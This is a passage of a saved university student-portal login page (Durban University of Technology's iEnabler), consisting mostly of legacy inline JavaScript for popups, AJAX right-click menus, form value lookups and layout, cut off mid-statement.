<!DOCTYPE html>
<!DOCTYPE html>
<html>
 <title>
  Self Help iEnabler
 </title>
 <meta content="text/html;charset=utf-8" http-equiv="content-type"/>
 <meta content="width=device-width, initial-scale=1" name="viewport"/>
 <meta content="IE=edge" http-equiv="X-UA-Compatible">
  <link href="https://www.w3schools.com/w3css/4/w3.css" rel="stylesheet"/>
  <link href="https://mercury.dut.ac.za/itsincludes/css/its.css" rel="stylesheet" type="text/css"/>
  <script language="JavaScript1.2" type="text/javascript">
   /* ***************************************************************************
  Program : its_scripts.js
  Version : 
  Changed : 31-MAR-2005 Ollie T119686 Add errReportBack logic
          : 07-JUL-2005 Ollie T121995 Add forceUpper logic    
          : 13-Sep-2005 Els t117575 No change - entry for bookpgm
          : 01-Feb-2006 Asit F128105 in isnumber use parseFloat iso parseInt
          : 14-NOV-2006 MUK T135979 added function run_LOV
          : 13-Feb-2007 VD  T124686 Add textLimit
          :                         Add imposeMaxLength
          : 19-Feb-2007 Els f139903 merged V13 and Int1 its_scripts.js as 
          :             changes from 31-Mar-2005 to 1-Feb-2006 was not on Int1
          : 06-Jun-2007 Adele T142258 Create a secure generic global LOV 
          : running mechanism - run_lov_secure.  
          : 21-Aug-2007 Jan t140791 Also check for 'P' when collecting data
          :                         for RC
          : 18-Feb-2008 Adele 148155(147116) Added X_SEARCH_BY_CODE parameter 
          : to Javascript function run_lov_secure. 
          : 28-Feb-2008 Sonja T147569 Comment out ITSinit (right click)
          : 05-Mar-2008 DG T148854 Added focus to LOV window
          : 24-Feb-2009 Dinong T155997 Add run_lov_bind
          : 30-Mar-2009 Dinong T156750 Add LOV headings
          : 18-May-2009 Dinong T156757 Add run_lov_bind_jsp
          : 09-Nov-2017 DG 225095 Style adjustments
          : 10-NOV-2017 DG 225957/231429 iEnabler look and feel enhancements
          : 02-Oct-2020 Adele T246328 - calldynBGProc - call new hopper
          : w01_setHeader.
  X0_VERSION : v04.1.0.2
  ***************************************************************************
*/

<!-- Hide from old browsers

// #######
// Script: Setup Datestamp for printing in Header of all pages
function prt_header_datestamp () {
 days = new Array("Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday");
 months = new Array("January","February","March","April","May","June","July","August","September","October","November","December");
 var today = new Date();
 todayYear = today.getYear();
 todayMonth = months[today.getMonth()];
 todayDay = days[today.getDay()];
 todayDate = today.getDate();
 // Add to end of day number
 if (todayDate == 1 || todayDate == 21 || todayDate == 31) {
 todayDate += "st";
 }
 else {
 if (todayDate == 2 || todayDate == 22) {
 todayDate += "nd";
 }
 else {
 if (todayDate == 3 || todayDate == 23) {
 todayDate += "rd";
 }
 else {
 todayDate += "th";
 }
 }
 }
 // Define print format and write to screen.
 var dsString = todayDay + ", " + todayDate + " " + todayMonth + " " + 
                ((today.getFullYear() < 100) ? "19" : "") + today.getFullYear();
 document.write(dsString);
return(' ');
} // end prt_header_datestamp

// #######
// Script: Mouse over for items
  var x_oldstyle;
  function goOver(ctl)
  {
    // Set the offset as defined for this specific row. To be used for right-click logic
    ITS_Offset = ctl.getAttribute("its_offset");

    if (ctl.className != "rowover") 
       {
       x_oldstyle = ctl.className;
       ctl.className="rowover";
       }
  }
  function goOut(ctl) 
  {
    // Reset the offset back to "Page-level". To be used for right-click logic
    ITS_Offset = "0";
    ctl.className=x_oldstyle;
  }

// #######
// Script: Force text within the field to Uppercase
// Run as: <input .... onChange="forceUpper(this);" ...>
  function forceUpper(ctl)
  {
  ctl.value = ctl.value.toUpperCase();
  }

// #######
// Script: Check if entered value is a number
  function isnumber(ctl)
  {
    if (parseFloat(ctl) != ctl)
    {
      return false;
    }
    else
    {
      return true;
    }
  }

function run_lov_secure(formName,codeName,descName,code,descr,fromClause,whereClause,lov_title,code_title,descr_title,showCode,theFilter,chkSum,returnRow) {
// T148854 Add returnRow parameter to function run_lov_secure and remove run_lov_multi from script file.
 var the_pathname = location.pathname;
 var i = the_pathname.indexOf ("/:");
 var j = the_pathname.indexOf ("/", ++i);

 if (i != -1) { // Syntactically incorrect url so it needs to be corrected
  the_pathname = the_pathname.substring (j, the_pathname.length);
 }; // (i != -1)
 if (returnRow == undefined) { returnRow = "-1"; }

 frmLOV = open("web.w01pkg.w01_lov_proc_sec" +
  "?X_FILTER=" + escape(theFilter) +
  "&X_CODE=" + escape(code) +
  "&X_DESCR=" + escape(descr) +
  "&X_FROM="+ escape(fromClause) +
  "&X_WHERE="+ escape(whereClause) +
  "&X_CALLER_URL=" + escape(location.protocol + "//" +
                            location.host + location.pathname +
                            location.search)+
  "&X_LOV_TITLE=" + escape(lov_title) +
  "&X_CODE_TITLE=" + escape(code_title) +
  "&X_DESCR_TITLE=" + escape(descr_title) +
  "&X_SHOW_CODE=" + escape(showCode) +
  "&X_FORM_ITEM_NAME=" + escape(formName) +
  "&X_CODE_ITEM_NAME=" + escape(codeName) +
  "&X_DESC_ITEM_NAME=" + escape(descName) +
  "&X_SEARCH_BY_CODE=" + escape(showCode) +   
  "&X_CHK=" + escape(chkSum) +
  "&X_RETURN_ROW="+ escape(returnRow),
  "winLOV", "scrollbars=yes,resizable=yes,width=450,height=400");
  window.frmLOV.focus();

 if (frmLOV.opener == null) { frmLOV.opener = self; }
} // end of function run_lov_secure

// #######
// Script: 
//-->


<!--

//Disable right mouse click Script
//By Maximus (maximus@nsimail.com) w/ mods by DynamicDrive
//For full source code, visit http://www.dynamicdrive.com

var message="Function Disabled!";

///////////////////////////////////
function clickIE4(){
  if (event.button==2){
    alert(message);
    return false;
  } else {
    return true;
  }
}

///////////////////////////////////
// function JSSumdet_Showme toggles the data between Summary and Detail layout
function JSSumdet_Showme(ctl)
{
  if (document.getElementById) // Internet Explorer
  {
    if (document.getElementById("xd"+ctl).style.display=="none")
    {
      document.getElementById("xd"+ctl).style.display="block";
      if (document.getElementById("xs"+ctl))
        document.getElementById("xs"+ctl).style.display="none";
    }
    else
    {
      document.getElementById("xd"+ctl).style.display="none";
      document.getElementById("xs"+ctl).style.display="block";
    }
  }
  else
  {
    document.all.xs1.style.display="block";
    document.all.xd1.style.display="block";
  }
}

///////////////////////////////////
// function JSMark_This gives user option to open or close all records with one click
   var x_sumrecs = 0;
   function JSMark_This(fldInd) {
   var i=1;
   while (i<=c_sumrecs)
     {
     if (fldInd.value=="Open All Records")
        {
        document.getElementById("xd"+i).style.display="block";
        document.getElementById("xs"+i).style.display="none";
        }
     else
        {
        document.getElementById("xd"+i).style.display="none";
        document.getElementById("xs"+i).style.display="block";
        }
   
     i++;
     }
   
   if (fldInd.value=="Open All Records")
      {
      fldInd.value="Close All Records";
      }
   else
      {
      fldInd.value="Open All Records";
      }
   }

///////////////////////////////////
// function JSMark_All Opens all records 
   function JSMark_All() {
   var i=1;
   while (i<=c_sumrecs)
   {
     document.getElementById("xd"+i).style.display="block";
     document.getElementById("xs"+i).style.display="none";
     i++;
   }
   
   }

<!--
////////////////////////////////////////////////////////////////////////////////////////////
//// This function will call any process on the server without actually refreshing the page
//// Please Note that this only works in IE5.5+ and Netscape6+
//// DBProcedure  - Mandatory, This is the Procedure to be called. Must return JavaScript.
////              -            This procedure must ALWAYS contain parameter for x_stmp.
////              -            This timestamp will contain a new value every time the procedure is 
////              -            called and ensures that no caching could be done.
//// DBParameters - Optional , Please start with & as first Parameter will be x_stmp
//// DBTagName    - Optional , Use different values if this function call should not overwrite data
////              -            from another call to the same function. 
////              -            By default this should be left out
////////////////////////////////////////////////////////////////////////////////////////////
function callDynBGproc(DBProcedure,DBParameters,DBTagName) {
	var dynamicScriptAreaTagName="dynScriptArea";
	var d = new Date();   // use the Date field to create a datestamp (to enforce unique URL)
    var v_param = DBParameters;
    var v_new_param = v_param.replace(/&/gi, "*");

	// Use the given tag name iso the default (if available)
	if (DBTagName && DBTagName != "")
		dynamicScriptAreaTagName=DBTagName;

	// first Ensure that this node does Not Exist. If it does, remove it.
	window.status='Clearing Previous Values';
	xx = document.getElementById(dynamicScriptAreaTagName);
	if (xx != null) {
		xx.parentNode.removeChild(document.getElementById(dynamicScriptAreaTagName));
	}

	// Now create a new SCRIPT Node and point the source to a procedure in the DB
	window.status='Working';
	xscript=document.createElement('script');
	xscript.setAttribute('language','Javascript');
	xscript.setAttribute('type','text/javascript');
	xscript.setAttribute('id',dynamicScriptAreaTagName);
	//alert(DBProcedure+'?x_stmp='+escape(d.getTime())+DBParameters);
	//alert(DBProcedure+'?x_stmp='+escape(d.getTime())+v_new_param);
//	xscript.setAttribute('src',DBProcedure+'?x_stmp='+escape(d.getTime())+DBParameters);
	xscript.setAttribute('src','web.w01pkg.w01_setHeader?x_stmp='+escape(d.getTime())+'&x_call='+DBProcedure+'&x_parms='+v_new_param);
	document.getElementsByTagName('head').item(0).appendChild(xscript);

    
	window.status='Done';
	return true
}

// -->
// Setup the reportback to *frm of any errors found in the *proc procedures
function errReportBack(err_source,err_string) {
var ErrorScriptAreaTagName="ErrScriptArea";
var err_text="";
if (err_source.length != 0)
   {
   err_text=err_text+err_source;
   }
if (err_string.length != 0)
   {
   err_text=err_text+
            'parent.F3.document.getElementById("ErrorDiv").innerHTML="'+err_string+'<br />&nbsp;"; '+
            'parent.F3.document.getElementById("ErrorDiv").style.display="block"; ';
   }

// Now add logic to ensure error only get reported once and is then removed
err_text=err_text+
         'xx = parent.F1.document.getElementById("'+ErrorScriptAreaTagName+'"); '+
	 'xx.parentNode.removeChild(xx);';


// first Ensure that this node does Not Exist.
xx = parent.F1.document.getElementById(ErrorScriptAreaTagName);
if (xx != null) {
	xx.parentNode.removeChild(parent.F1.document.getElementById(ErrorScriptAreaTagName));
}

// Now create a new ERROR SCRIPT Node and Populate with specified Detail
xscript=parent.F1.document.createElement('script');
xscript.setAttribute('language','Javascript');
xscript.setAttribute('type','text/javascript');
xscript.setAttribute('id',ErrorScriptAreaTagName);
//alert(err_text);
// Use the following line to populate for Internet Explorer
xscript.setAttribute('text','function chk_for_errors() {'+err_text+'}');
parent.F1.document.getElementsByTagName('head').item(0).appendChild(xscript);
// Use the following line to populate the DOM (Throw away errors generated by Internet Explorer)
try{parent.F1.document.getElementById(ErrorScriptAreaTagName).innerHTML='function chk_for_errors() {'+err_text+'}';}catch(e){void(0)}
//alert(parent.F1.document.getElementById(ErrorScriptAreaTagName).innerHTML);
window.status='Done';
}


<!--

/*
//Disable right mouse click Script
//By Maximus (maximus@nsimail.com) w/ mods by DynamicDrive
//For full source code, visit http://www.dynamicdrive.com
*/

var message="Function Disabled!";

///////////////////////////////////
/*
function clickIE4(){
if (event.button==2){
alert(message);
return false;
}
}

function clickNS4(e){
if (document.layers||document.getElementById&&!document.all){
if (e.which==2||e.which==3){
alert(message);
return false;
}
}
}

if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS4;
}
else if (document.all&&!document.getElementById){
document.onmousedown=clickIE4;
}

document.oncontextmenu=new Function("alert(message);return false")
*/
// --> 

//////////////////////////////
function textLimit(field, maxlen) 
{
  if (field.value.length > maxlen + 1)
  alert('Your input has been truncated! Only '+maxlen+' characters are allowed.');
  if (field.value.length > maxlen)
    field.value = field.value.substring(0, maxlen);
}

//////////////////////////////
function imposeMaxLength(Object, MaxLen)
{
  if (eval(Object.value.length) >= eval(MaxLen))
  {
    Object.value = Object.value.substring(0, MaxLen - 1);
  }
}


//////////////////////////////////////////////////////////////////////////
// Mark all table Rows for use with generic Right-click logic
//////////////////////////////////////////////////////////////////////////
var ITS_Offset = 0; // Set offset level to PAGE. Anything above zero will define row level
function setITSOffsetDefinition(){
var v_tr = document.getElementsByTagName("tr");
var v_offset_cntr = 0;
for (var i = 0; i < v_tr.length ; i++)
{
// var v_class = v_tr[i].getAttribute("class"); // This does not seem to work in IE...Try the following:
var v_class = "UNKNOWN";
var v_attr =v_tr[i].attributes;
for (var j = 0; j < v_attr.length ; j++) {
     //alert (v_attr[j].name + "=" + v_attr[j].value);
     if (v_attr[j].name == "class") v_class = v_attr[j].value;
    }
   // alert(v_class);
   if (v_class == "rldata" || v_class == "mrdatadisp" || v_class == "rowover")
      { v_tr[i].setAttribute("its_offset",++v_offset_cntr) } else
      { v_tr[i].setAttribute("its_offset","0") }
   //alert("Class of element " + i + " is : " + v_tr[i].getAttribute("class") + "\n");
}

//
// Testing to see if Attribute is set.
//
//var v_tr = document.getElementsByTagName("tr");
//for (var i = 0; i < v_tr.length ; i++)
//{
//   alert("Class of Row " + v_tr[i].getAttribute("its_offset") + " is : " + v_tr[i].getAttribute("class") + "\n");
//}
}




//////////////////////////////////////////////////////////////////////////////
// Use this function to load an extra javascript file                       //
// x_jsFile = The relative file name that must be uploaded/included         //
//////////////////////////////////////////////////////////////////////////////
function itsUploadJSfile(x_jsFile) {
var html_doc = document.getElementsByTagName('head').item(0);
var vjs = document.createElement('script');
vjs.setAttribute('language', 'javascript');
vjs.setAttribute('type', 'text/javascript');
vjs.setAttribute('src', x_jsFile);
html_doc.appendChild(vjs);
return false;
}

//////////////////////////////////////////////////////////////////////////////
// Use this function to load an extra Stylesheet files                      //
// x_cssFile = The relative file name that must be uploaded/included        //
//////////////////////////////////////////////////////////////////////////////
function itsUploadCSSfile(x_cssFile) {
var html_doc = document.getElementsByTagName('head').item(0);
var vcss = document.createElement('link');
vcss.setAttribute('rel', 'stylesheet');
vcss.setAttribute('type', 'text/css');
vcss.setAttribute('href', x_cssFile);
html_doc.appendChild(vcss);
return false;
}

function viewSource() {
alert('You Pressed View Source');
}
/*
isMozilla = (document.all) ? 0 : 1;
if (isMozilla)
{
d_loc="view-source:" + document.location.href;
d=window.open(d_loc);
}
else
{
d=window.open();
d.document.open('text/plain').write(document.documentElement.outerHTML);
}
}
*/
//////////////////////////////////////////////////////////////////////////////
// Use this function to get a specified value from the html page.           //
// It works either per FORM or per TABLE Column number                      //
// if x_formsOrTD = 'F' then x_ind1=>The Form name,                         //
//                           x_ind2=>The Field Name                         //
//                           x_offset=>The offset within the form           //
//                                     Normally this is row-1 (forms base-0)//
//                                     In Multi-row forms: row-3 (2-Dummies)//
//                                     For non-repeat fields: 0 (i.e year)  //
// if x_formsOrTD = 'T' then x_ind1=>The n'th <td> column (-1 because base0)//
//                           x_ind2=>The n'th textnode within above <td>    //
//                           x_offset=>The specified Row (nothing strange)  //
// if x_formsOrTD = 'P' then x_ind1=> is a parameter name the return value  //
//                                    is the value of the parameter         //
//////////////////////////////////////////////////////////////////////////////
function getRCvalue(x_formsOrTD, x_ind1, x_ind2, x_offset) 
{
 // document.write('FormsorTD:'+x_formsOrTD+' 1:'+x_ind1+' 2:'+x_ind2+' Offset'+ x_offset);
if (x_formsOrTD == 'T') 
   { //x_ind1=>The n'th column/TD, x_ind2=>The n'th textnode
    if (ITS_Offset == "0") {return "";} // Right Click wasnt done inside a legal area
      var v_tr = document.getElementsByTagName("tr");
      for (var i = 0; i < v_tr.length ; i++)
      {
      if (v_tr[i].getAttribute("its_offset") == ITS_Offset) // Get to the right row
         {
         var v_td = v_tr[i].getElementsByTagName("td");
         if (v_td[x_ind1 -1].childNodes[x_ind2].nodeType == "3") // If this is a textNode: return it
            return v_td[x_ind1 -1].childNodes[x_ind2].nodeValue;
         else // else: Assume it is an element (like a tag "<a href...></a>" and return its first child node
            return v_td[x_ind1 -1].childNodes[x_ind2].childNodes[0].nodeValue;
         }
      }
   }// if (x_formsOrTD == 'T')
else 
   {
   if (x_formsOrTD == 'P') 
      { //Get value from URL x_ind2 = parameter
      var UrlPars = new Array()
      UrlPars = location.search.split("?")[1].split("&")
      // document.write(UrlPars[1])
      for (x in UrlPars)
         { ParVal=UrlPars[x]
         var ValPair=ParVal.split('=')
         if (ValPair[0]==x_ind2)
            {
            return ValPair[1]
            }
         }
      return " ";
      }
   else
      {    // if (x_formsOrTD == 'F')
      if (x_formsOrTD == 'F') {
      if (x_offset == '') // Sometimes no offset is needed
         { 
         // Checkbox Works Different. is IT
         if (eval('document.'+x_ind1+'.'+x_ind2+'.type') == "checkbox")
            {
            if (eval('document.'+x_ind1+'.'+x_ind2+'.checked'))
               { return eval('document.'+x_ind1+'.'+x_ind2+'.value'); }
            else
               { return ""; }
         }

         // Radio Buttons are even Worse !@#$%^!@#$%^
         if (eval('document.'+x_ind1+'.'+x_ind2+'.type') == "undefined") 
            {
            if (eval('document.'+x_ind1+'.'+x_ind2+'[0].type') == "radio")
               {
               v_workingFld = eval('document.'+x_ind1+'.'+x_ind2);
               for (ci=0; ci<v_workingFld.length; ci++) 
                  { if (v_workingFld[ci].checked) 
                        { return v_workingFld[ci].value;}
                  }
               return "";
               }
            }
            return eval('document.'+x_ind1+'.'+x_ind2+'.value;');
         }
      else
         { 
         // Checkbox Works Different !@#$%^
         if (eval('document.'+x_ind1+'.'+x_ind2+'['+x_offset+'].type') == "checkbox")
            {
            if (eval('document.'+x_ind1+'.'+x_ind2+'['+x_offset+'].checked'))
               { return eval('document.'+x_ind1+'.'+x_ind2+'['+x_offset+'].value'); } 
            else 
               { return ""; }
            }
         // Radio Buttons are even Worse !@#$%^!@#$%^
         if (eval('document.'+x_ind1+'.'+x_ind2+'['+x_offset+'].type') == "undefined")
            {
            if (eval('document.'+x_ind1+'.'+x_ind2+'['+x_offset+'][0].type') == "radio")
               {
               v_workingFld = eval('document.'+x_ind1+'.'+x_ind2+'['+x_offset+']');
               for (ci=0; ci<v_workingFld.length; ci++) 
                     { if (v_workingFld[ci].checked) { return v_workingFld[ci].value;}}
               return "";
               }
            }
         // TODO: Add code to get selectedindex....value detail
         return eval('document.'+x_ind1+'.'+x_ind2+'['+x_offset+'].value;');
         }
      }
   else
      {
      return "";
      }
   }
}
}
///////////////////////////////////////////////////////////////////////////
// Use AJAX to request the Right-Click-Menu items and instructions.      //
// NOTE: The "Request" only forwards the query.                          //
//     : Look in the "Response" part for the actual code                 //
///////////////////////////////////////////////////////////////////////////
function  ItsRCMenu_AjaxRequest() {
  // Get the Procedure name
  var v_urlArr = location.href.toLowerCase().split("?"); // First remove any input parameters
      v_urlArr = v_urlArr[0].split(".");                 // split on the dots
  var v_urlLength = v_urlArr.length;
  var v_urlProcedure = v_urlArr[v_urlLength-1];          // Take the stuff behind the last dot
  // Get the Package name
  v_urlArr = v_urlArr[v_urlLength-2].split("/");
  v_urlLength = v_urlArr.length;
  var v_urlPackage = v_urlArr[v_urlLength-1];           // Take the stuff before the last dot
  // Get the DAD
 //alert(location.href.toLowerCase().split("/pls/")[1].split("/")[0]);
 var v_dad = '';
 if (location.href.toLowerCase().split("/pls/").length > 1)
     { v_dad = '/pls/'+location.href.toLowerCase().split("/pls/")[1].split("/")[0]; }
 else
     { v_dad = '/'    +location.href.toLowerCase().split(":")[2].split("/")[1]; }
 
  // Setup the AJAX request
  var v_url  = v_dad+'/wr02pkg.wr02_getRCmenu';
      v_url += '?x_pkg='+encodeURIComponent(v_urlPackage)+'&x_proc='+encodeURIComponent(v_urlProcedure)+'&x_offset='+encodeURIComponent(ITS_Offset);   
      // v_url = v_dad+'/wr02pkg.wr02_getRCmenu?x_pkg=w99pkg&x_proc=mi_main_menu&x_offset=0';
      // TODO: Maybe add a timestamp to the above v_url
  // Do the AJAX Call
  var xmlHttp=GetXmlHttpObject();
  SetXmlHttphandler(function() { ItsRCMenu_AjaxResponse(xmlHttp); },xmlHttp);
  xmlHttp.open("GET", v_url , false);
  xmlHttp.send();
}
//////////////////////////////////////////////////////////////////////////////
// Use AJAX response to format the Right-Click-Menu items and instructions. //
// Note: Parameters for addMenuItem is as follows:                          //
//       1) Description/name of menu entry to be displayed                  //
//       2) Name of the Submenu linked to this option                       //
//       3) Instruction to be performed when user chooses this option       //
//   NOTE: An entry can either be a submenu link or an instruction not both //
//////////////////////////////////////////////////////////////////////////////
function ItsRCMenu_AjaxResponse(xmlHttp) 
{ 
  if (xmlHttp != null && (xmlHttp.readyState==4 || xmlHttp.readyState=="complete"))
  {
    var v_response = xmlHttp.responseXML.documentElement;
    if (v_response != null) {
    if (v_response.getElementsByTagName('MENU_ROW')[0] == null)
    {
      var error_message="";
      if (v_response.getElementsByTagName('error_description')[0] == null) 
         { error_message=""; }
      else          
         { error_message = v_response.getElementsByTagName('error_description')[0].firstChild.data; }
      var java_error_message="";
      if (v_response.getElementsByTagName('java_error_description')[0] != null)
       {
       java_error_message = v_response.getElementsByTagName('java_error_description')[0].firstChild.data;
       }
      itsRCmenu = new jsDOMenu(500); // The parameter (500) is the display width of the popup
      itsRCmenu.addMenuItem(new menuItem(error_message,"",""));
      if (java_error_message != "") itsRCmenu.addMenuItem(new menuItem(java_error_message,"",""));
      itsRCmenu.addMenuItem(new menuItem("-",""," "));
      itsRCmenu.addMenuItem(new menuItem("Response Status Code="+xmlHttp.status, "", ""));
      itsRCmenu.addMenuItem(new menuItem("Response Status Text="+xmlHttp.statusText, "", ""));
      itsRCmenu.addMenuItem(new menuItem("Response Full Text="+xmlHttp.responseText, "", ""));
      itsRCmenu.addMenuItem(new menuItem("-",""," "));
      itsRCmenu.addMenuItem(new menuItem("View Source", "", "javascript:viewSource();"));
    }
    else
    {
    var v_menuRows = v_response.getElementsByTagName('MENU_ROW');
    // First build the individual menu structures
    for (v_c01 = 0; v_c01 < v_menuRows.length; v_c01++) 
        {
        var v_str  = '';
            v_str += v_menuRows[v_c01].getElementsByTagName('name')[0].firstChild.data;
            v_str += ' = new jsDOMenu(';
            v_str += v_menuRows[v_c01].getElementsByTagName('length')[0].firstChild.data;
            v_str += ');';
            eval(v_str);
            
        // Add the individual items in this menu
        var v_menuItems = v_menuRows[v_c01].getElementsByTagName('MENU_ITEMS');
        for (v_c02 = 0; v_c02 < v_menuItems.length; v_c02++)
            {
            // alert(v_menuItems[v_c02].getElementsByTagName('description')[0].firstChild.data);
            var v_str  = '';
            v_str += v_menuRows[v_c01].getElementsByTagName('name')[0].firstChild.data;
            v_str += '.addMenuItem(new menuItem("';
            v_str += v_menuItems[v_c02].getElementsByTagName('description')[0].firstChild.data;
            v_str += '","';
            if (v_menuItems[v_c02].getElementsByTagName('submenu')[0].firstChild != null)
            v_str += v_menuItems[v_c02].getElementsByTagName('submenu')[0].firstChild.data;
            v_str += '","'
            if (v_menuItems[v_c02].getElementsByTagName('instruction')[0].firstChild != null)
            v_str += v_menuItems[v_c02].getElementsByTagName('instruction')[0].firstChild.data;
            v_str += '"));';
            eval(v_str);
            }
        }
    // Now hook the submenus onto their their masters
    for (v_c01 = 0; v_c01 < v_menuRows.length; v_c01++) 
        {
        var v_menuItems = v_menuRows[v_c01].getElementsByTagName('MENU_ITEMS');
        for (v_c02 = 0; v_c02 < v_menuItems.length; v_c02++)
            {
            if (v_menuItems[v_c02].getElementsByTagName('submenu')[0].firstChild != null &&
                v_menuItems[v_c02].getElementsByTagName('submenu')[0].firstChild.data != '')
               {
               var v_str  = '';
               v_str += v_menuRows[v_c01].getElementsByTagName('name')[0].firstChild.data;
               v_str += '.items.';
               v_str += v_menuItems[v_c02].getElementsByTagName('submenu')[0].firstChild.data;
               v_str += '.setSubMenu('
               v_str += v_menuItems[v_c02].getElementsByTagName('submenu')[0].firstChild.data;
               v_str += 'menu);';
               eval(v_str);
               }
            }
        }
    eval('setPopUpMenu('+v_menuRows[0].getElementsByTagName('name')[0].firstChild.data+');');
    }
  } 
  }

} 

////////////////////////////////////////////////////////////////////////////////
// This function will be started for every page that includes its_scripts.js
////////////////////////////////////////////////////////////////////////////////
function ITSinit(){
  if (document.createElement && document.getElementById) {
    createjsDOMenu();
  }
}
////////////////////////////////////////////////////////////////////////////////
// Upload the following .js files
////////////////////////////////////////////////////////////////////////////////
//147569 start
//itsUploadCSSfile('/itsincludes/css/jsdomenu.css');
//itsUploadJSfile('/itsincludes/js/its_general.js');
//itsUploadJSfile('/itsincludes/js/jsdomenu.js');

//window.onload=ITSinit; // TODO: What happens if window already has an "onload" event?
//147569  end

//
function run_lov_bind(formName,itemName,itemDesc,theFilter,
                      lovCode,lovParms,showCode,chkSum,codeHeading,
                      descHeading,returnRow)
 {
  if (returnRow == undefined) 
     { 
      returnRow = "-1"; 
     }
  if (codeHeading == undefined)
     {
      codeHeading = "Code";
     }
  if (descHeading == undefined)
     {
      descHeading = "Description";
     }
  frmLOV = open("web.w01pkg.w01_lov_bind" +
                "?X_THEFILTER="  + escape(theFilter) +
                "&X_FORM_NAME="  + escape(formName) +
                "&X_ITEM_NAME="  + escape(itemName) +
                "&X_ITEM_DESC="  + escape(itemDesc) +
                "&X_LOVCODE="    + escape(lovCode) +
                "&X_LOVPARMS="   + escape(lovParms) +
                "&X_SHOWCODE="   + escape(showCode) +
                "&X_CHKSUM="     + escape(chkSum) +
                "&X_CODE_HEADING=" + escape(codeHeading)+
                "&X_DESC_HEADING=" + escape(descHeading)+
                "&X_RETURN_ROW=" + escape(returnRow)+
                "&X_CALLER_URL=" + escape(location.protocol + "//" +
                                          location.host + location.pathname +
                                          location.search),
                "winLOV", 
                "scrollbars=yes,resizable=yes,width=450,height=400");
  window.frmLOV.focus();
  if (frmLOV.opener == null) 
     { 
      frmLOV.opener = self; 
     }
}
function run_lov_bind_jsp(formName,itemName,itemDesc,theFilter,
                          lovCode,lovParms,showCode,chkSum,theDad,codeHeading,
                          descHeading,returnRow)
 {
  if (returnRow == undefined) 
     { 
      returnRow = "-1"; 
     }
  if (codeHeading == undefined)
     {
      codeHeading = "Code";
     }
  if (descHeading == undefined)
     {
      descHeading = "Description";
     }
  frmLOV = open("/pls/"+theDad+"/web.w01pkg.w01_lov_bind" +
                "?X_THEFILTER="  + escape(theFilter) +
                "&X_FORM_NAME="  + escape(formName) +
                "&X_ITEM_NAME="  + escape(itemName) +
                "&X_ITEM_DESC="  + escape(itemDesc) +
                "&X_LOVCODE="    + escape(lovCode) +
                "&X_LOVPARMS="   + escape(lovParms) +
                "&X_SHOWCODE="   + escape(showCode) +
                "&X_CHKSUM="     + escape(chkSum) +
                "&X_CODE_HEADING=" + escape(codeHeading)+
                "&X_DESC_HEADING=" + escape(descHeading)+
                "&X_RETURN_ROW=" + escape(returnRow)+
                "&X_CALLER_URL=" + escape(location.protocol + "//" +
                                          location.host + location.pathname +
                                          location.search),
                "winLOV", 
                "scrollbars=yes,resizable=yes,width=450,height=400");
  window.frmLOV.focus();
  if (frmLOV.opener == null) 
     { 
      frmLOV.opener = self; 
     }
}

//225095
//Get style property [styleProp] from component [el]
function getStyle(el,styleProp) {
	var x = document.getElementById(el);
	if (x.currentStyle)
    //For IE
		var y = x.currentStyle[styleProp];
	else if (window.getComputedStyle)
    //Firefox etc
		var y = document.defaultView.getComputedStyle(x,null).getPropertyValue(styleProp);
	return y;
}

//Get URL parameters
function getAllUrlParams(url) {

  // get query string from url (optional) or window
  var queryString = url ? url.split('?')[1] : window.location.search.slice(1);

  // we'll store the parameters here
  var obj = {};

  // if query string exists
  if (queryString) {

    // stuff after # is not part of query string, so get rid of it
    queryString = queryString.split('#')[0];

    // split our query string into its component parts
    var arr = queryString.split('&');

    for (var i=0; i<arr.length; i++) {
      // separate the keys and the values
      var a = arr[i].split('=');

      // in case params look like: list[]=thing1&list[]=thing2
      var paramNum = undefined;
      var paramName = a[0].replace(/\[\d*\]/, function(v) {
        paramNum = v.slice(1,-1);
        return '';
      });

      // set parameter value (use 'true' if empty)
      var paramValue = typeof(a[1])==='undefined' ? true : a[1];

      // (optional) keep case consistent
      paramName = paramName.toLowerCase();
      paramValue = paramValue.toLowerCase();

      // if parameter name already exists
      if (obj[paramName]) {
        // convert value to array (if still string)
        if (typeof obj[paramName] === 'string') {
          obj[paramName] = [obj[paramName]];
        }
        // if no array index number specified...
        if (typeof paramNum === 'undefined') {
          // put the value on the end of the array
          obj[paramName].push(paramValue);
        }
        // if array index number specified...
        else {
          // put the value at that index number
          obj[paramName][paramNum] = paramValue;
        }
      }
      // if param name doesn't exist yet, set it
      else {
        obj[paramName] = paramValue;
      }
    }
  }

  return obj;
}

//225095
function w3_open() {
  parent.document.getElementById("mySidebar").style.display = "block";
  parent.document.getElementById("myOverlay").style.display = "block";
}
function w3_close() {
  parent.document.getElementById("mySidebar").style.display = "none";
  parent.document.getElementById("myOverlay").style.display = "none";
}
  </script>
  <body class="w3-margin-left">
   <div class="fra_header w3-theme-l4" id="fra_header">
    <div class="fra_inst">
     DURBAN UNIVERSITY OF TECHNOLOGY
    </div>
    <div class="fra_date w3-hide-small">
     <script type="text/javascript">
      document.write("Thursday, 10 July 2025 at 12:09:20");
     </script>
    </div>
   </div>
   <div class="w3-row w3-hide-small">
    <div class="w3-half itslogimg">
     <img alt="DURBAN UNIVERSITY OF TECHNOLOGY" src="https://mercury.dut.ac.za/itsimages/InsImg.gif"/>
    </div>
    <div class="w3-half" id="adaptit" style="text-align: right;">
     <img alt="ITS Tertiary Software" src="https://mercury.dut.ac.za/itsimages/ItsImg.gif"/>
    </div>
   </div>
   <div class="login_top" id="login_top">
    <script type="text/javascript">
     /* ************************************************************************
  Program : login_top.js
  Changed : 09-Nov-2017 DG 225095 Style adjustments
          : 10-NOV-2017 DG 225957 iEnabler look and feel enhancements
  X0_VERSION : v04.1.0.0
  Add any HTML for top DIV of page
************************************************************************ */
document.write('<p/>');
    </script>
   </div>
   <div class="login w3-row">
    <script type="text/javascript">
     // Changed: 17-Jan-2006 T124360 
//        : 08-Mar-2007 Els t140480 copied from v13
//        : 24-Oct-2007 DG F145858 Add new message for closed application cycles
//        : 26-Oct-2007 DG F115522 Implement links to new modules
//        : 31-Oct-2008 DG F154159 Spelling errors
//        : 04-Jun-2009 DG T157045 Alumni Login changes
//        : 06-Aug-2013 ChristoV T187909 Modify Call to New Interest to Study Here Application
//        : 09-Nov-2017 DG 225095 Style adjustments
//        : 10-NOV-2017 DG 225957 iEnabler look and feel enhancements
// Version: v04.1.0.0
document.write('<div id="login_left" class="w3-third w3-container">'+
